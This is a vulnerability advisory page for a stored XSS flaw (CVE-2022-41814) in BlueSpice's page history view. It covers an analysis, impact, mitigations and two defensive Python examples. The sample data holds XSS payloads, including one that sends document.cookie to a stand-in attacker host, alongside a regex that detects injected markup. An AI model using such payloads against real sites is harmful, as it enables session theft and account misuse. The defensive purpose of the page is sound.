
CVE-2022-41814: CWE-79 Cross-site Scripting (XSS) in Hallo Welt! GmbH BlueSpice

Severity: Low
Tags: vulnerability, CVE-2022-41814, cwe-79
Published: Tue Nov 15 2022 (11/15/2022, 14:24:50 UTC)
Source: CVE
Vendor/Project: Hallo Welt! GmbH
Product: BlueSpice

Description

Cross-site Scripting (XSS) vulnerability in BlueSpiceFoundation extension of BlueSpice allows user with regular account and edit permissions to inject arbitrary HTML into the history view of a wikipage.

AI-Powered Analysis

Last updated: 06/25/2025, 02:35:20 UTC

Technical Analysis

CVE-2022-41814 is a cross-site scripting (XSS) vulnerability in the BlueSpiceFoundation extension of BlueSpice, the MediaWiki-based enterprise wiki developed by Hallo Welt! GmbH; the affected release line is BlueSpice 4. A user who holds an ordinary account with edit permissions can inject arbitrary HTML into the history view of a wiki page. The root cause is the classic stored XSS pattern: a value the editor controls is written into the history markup without being HTML-encoded for the context it lands in, so the browser of anyone who later opens that history view interprets the attacker's markup instead of displaying it as text. The weakness is CWE-79, improper neutralization of input during web page generation. The CVSS 3.1 base score is 3.3 (Low), from a vector of local attack vector (AV:L), low attack complexity (AC:L), low privileges required (PR:L), no user interaction (UI:N), low confidentiality impact (C:L) and no integrity or availability impact. Two caveats on that score: AV:L is an unusual choice for an XSS in a web application, which an attacker reaches over the network, and a stored XSS is normally scored with UI:R because a victim has to open the poisoned view; if your risk process keys off the number, rescore the issue for your own deployment rather than taking 3.3 at face value. No exploitation in the wild has been reported, and the source record carries no patch or mitigation link. The CVE was reserved on October 7, 2022 and published on November 15, 2022. Because "arbitrary HTML" includes script elements and event-handler attributes, an attacker with edit rights can run JavaScript in the session of any user who views the page history: that allows actions on the wiki as the victim, reading page content the victim can see, stealing the session cookie where it is not marked HttpOnly, or presenting phishing content inside the trusted wiki origin.
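As an added illustration (not BlueSpice or MediaWiki code; the page does not say which history field carries the injected value, so the revision field names below are assumptions), here is the vulnerable rendering pattern the analysis describes next to its hardened form. Both outputs are fed through Python's own HTML parser to show which elements and attributes a browser would actually build from each row:

```python
import html
from html.parser import HTMLParser

# Constructed sample revision, as a history view might receive it. The field
# names are assumptions for this illustration, not BlueSpice's data model. The
# "user" and "summary" values carry payloads a user with edit rights could
# supply: a script element in text context and an attribute break-out.
REVISION = {
    "revid": 1042,
    "user": "editor<script>alert(1)</script>",
    "timestamp": "2022-10-07T12:00:00Z",
    "summary": 'fix typo" onmouseover="alert(document.cookie)',
}


def render_row_unsafe(rev):
    """Vulnerable pattern (CWE-79): user-controlled values are concatenated
    straight into the markup, so the viewer's browser interprets them."""
    return (
        f'<tr><td><a href="?oldid={rev["revid"]}">{rev["timestamp"]}</a></td>'
        f'<td>{rev["user"]}</td>'
        f'<td title="{rev["summary"]}">{rev["summary"]}</td></tr>'
    )


def render_row_safe(rev):
    """Hardened pattern: validate the one structured value (the revision id must
    be an integer) and HTML-encode every free-text value at the point it is
    written into the page. quote=True also encodes " and ', which is what
    stops the break-out from the title="" attribute context."""
    revid = int(rev["revid"])  # raises ValueError on anything non-numeric
    user = html.escape(str(rev["user"]), quote=True)
    timestamp = html.escape(str(rev["timestamp"]), quote=True)
    summary = html.escape(str(rev["summary"]), quote=True)
    return (
        f'<tr><td><a href="?oldid={revid}">{timestamp}</a></td>'
        f'<td>{user}</td>'
        f'<td title="{summary}">{summary}</td></tr>'
    )


class _TagCollector(HTMLParser):
    """Records the element and attribute names a parser creates from markup."""

    def __init__(self):
        super().__init__()
        self.tags = set()
        self.attrs = set()

    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)
        self.attrs.update(name for name, _ in attrs)


def browser_view(rendered):
    """Approximate the browser's DOM: return (element names, attribute names)
    that a parser builds from the rendered row. A script element or an on*
    attribute showing up here means the payload became live markup."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return parser.tags, parser.attrs


if __name__ == "__main__":
    for name, render in (("unsafe", render_row_unsafe), ("safe", render_row_safe)):
        tags, attrs = browser_view(render(REVISION))
        print(f"{name}: elements={sorted(tags)} attributes={sorted(attrs)}")
```

The unsafe row yields a script element and an onmouseover attribute; the safe row yields only tr, td and a with href and title, and the payload survives as visible text. The point to take into a code review is that the fix lives at the output, per HTML context, not in an input filter at edit time.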

Potential Impact

For European organizations running BlueSpice 4, this is primarily a confidentiality issue whose reach is bounded by the attacker needing an edit-capable account. Within that bound the impact is real: a malicious editor (an insider, a contractor, or an attacker holding a compromised account) can plant markup that runs in the browser of every user who opens the page history, including administrators reviewing changes, and script running there can read any wiki content the victim can see, submit edits or other actions as the victim, or, where the session cookie lacks HttpOnly, steal it. Note that the published vector records no integrity impact, yet script executing in a victim's session can write to the wiki as that user, so treat integrity as in scope for your own assessment. Availability is not affected. Organizations that use BlueSpice for internal documentation, knowledge management or collaboration therefore face leakage of internal information and reputational damage if the flaw is exploited, and the exposure is greatest where edit rights are granted broadly or edits are not reviewed. BlueSpice is used by enterprises and public-sector bodies across Europe, particularly in Germany where the vendor is based, which raises the number of potential targets. The absence of known exploits in the wild suggests limited active threat but does not rule out targeted use by someone who already holds an account.

Mitigation Recommendations

Apply vendor-provided security updates promptly: the source record here carries no patch link, so check Hallo Welt!'s release notes for a BlueSpice 4 build that addresses CVE-2022-41814 and plan that upgrade as the primary fix. Until then, restrict edit permissions to trusted users and audit roles regularly so that the population of accounts able to inject content stays small; the attack needs nothing more than an edit-capable login. Where you maintain the deployment's code, harden the history view by HTML-encoding every user-controlled value at the point it is rendered and validating structured values such as revision ids; this is output encoding for the exact HTML context, not input filtering, and it is the change that actually removes the flaw. Periodically scan the revision metadata the history view renders (edit summaries, user names) for raw HTML, event-handler attributes or javascript: URLs, since a stored payload sits in the database waiting for the next viewer and is easy to find retrospectively. Tell users with edit rights that injecting markup is a policy violation that is audited. A web application firewall with custom rules can block obvious payloads in edit and history requests, but it is a stopgap that a determined attacker can encode around. Finally, deploy a Content Security Policy that disallows inline script and restricts script sources to your own origin; MediaWiki-based wikis rely on inline scripts in places, so test the policy in report-only mode first (MediaWiki exposes this through its $wgCSPHeader setting) before enforcing it. CSP limits what injected script can do; it does not stop the HTML injection itself, and non-script HTML such as forms, images and links can still be used for phishing or exfiltration.
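The monitoring step above, as an added example that is not part of this page or of the BlueSpice project: scanning revision metadata for raw HTML. The input is a constructed sample shaped like a MediaWiki API response for action=query&prop=revisions&rvprop=ids|user|timestamp|comment&formatversion=2, which is the API BlueSpice inherits from MediaWiki; the page, revisions and payloads are invented, and because the advisory does not say which history field is affected, both the user name and the edit summary are scanned.

```python
import json
import re

# Constructed sample shaped like a MediaWiki API response to
#   api.php?action=query&prop=revisions&titles=Onboarding
#           &rvprop=ids|user|timestamp|comment&rvlimit=50&format=json&formatversion=2
# The page, revisions and payloads are invented for this example.
SAMPLE_RESPONSE = json.dumps({
    "query": {"pages": [{
        "pageid": 17,
        "title": "Onboarding",
        "revisions": [
            {"revid": 301, "user": "Alice", "timestamp": "2022-11-01T09:12:00Z",
             "comment": "Add section on VPN setup"},
            {"revid": 302, "user": "Bob", "timestamp": "2022-11-02T10:03:00Z",
             "comment": "typo: 1 < 2, not 2 < 1"},   # benign '<', must not alert
            {"revid": 303, "user": "mallory", "timestamp": "2022-11-03T11:45:00Z",
             "comment": "cleanup <img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"},
            {"revid": 304, "user": "Carol<svg/onload=alert(1)>",
             "timestamp": "2022-11-04T08:20:00Z", "comment": "revert"},
        ],
    }]}
})

# Markup that has no business in an edit summary or a user name: a tag opener,
# an inline event handler, or a javascript: URL. Deliberately loose; tune it
# against your own wiki's history before alerting on it.
SUSPICIOUS = re.compile(
    r"<\s*/?[a-z][\w-]*[\s/>]"   # <img , <svg/, </script>
    r"|\bon[a-z]+\s*="           # onerror=, onload =
    r"|javascript\s*:",          # javascript: URLs
    re.IGNORECASE,
)

# Free-text revision fields a history view renders; both are scanned because
# the advisory does not say which one is affected.
SCANNED_FIELDS = ("user", "comment")


def find_suspicious_revisions(api_json):
    """Return one finding per (revision, field) whose text matches SUSPICIOUS."""
    findings = []
    for page in json.loads(api_json)["query"]["pages"]:
        for rev in page.get("revisions", []):
            for field in SCANNED_FIELDS:
                match = SUSPICIOUS.search(str(rev.get(field, "")))
                if match:
                    findings.append({
                        "title": page["title"],
                        "revid": rev["revid"],
                        "timestamp": rev.get("timestamp"),
                        "field": field,
                        "match": match.group(0),
                    })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_revisions(SAMPLE_RESPONSE):
        print(f"{f['title']} rev {f['revid']} ({f['timestamp']}): "
              f"{f['field']} contains {f['match']!r}")
```

Run against a live wiki, replace SAMPLE_RESPONSE with the body returned by the api.php query above for each page of interest (a bot account with read access is enough), and feed the findings to whatever alerting you already have; the revid identifies the exact edit to review and, if needed, suppress.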


Technical Details

Data Version: 5.1
Assigner Short Name: HW
Date Reserved: 2022-10-07T00:00:00.000Z
CISA Enriched: true
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 682d983cc4522896dcbee8d6

Added to database: 5/21/2025, 9:09:16 AM

Last enriched: 6/25/2025, 2:35:20 AM

Last updated: 2/7/2026, 8:59:00 AM


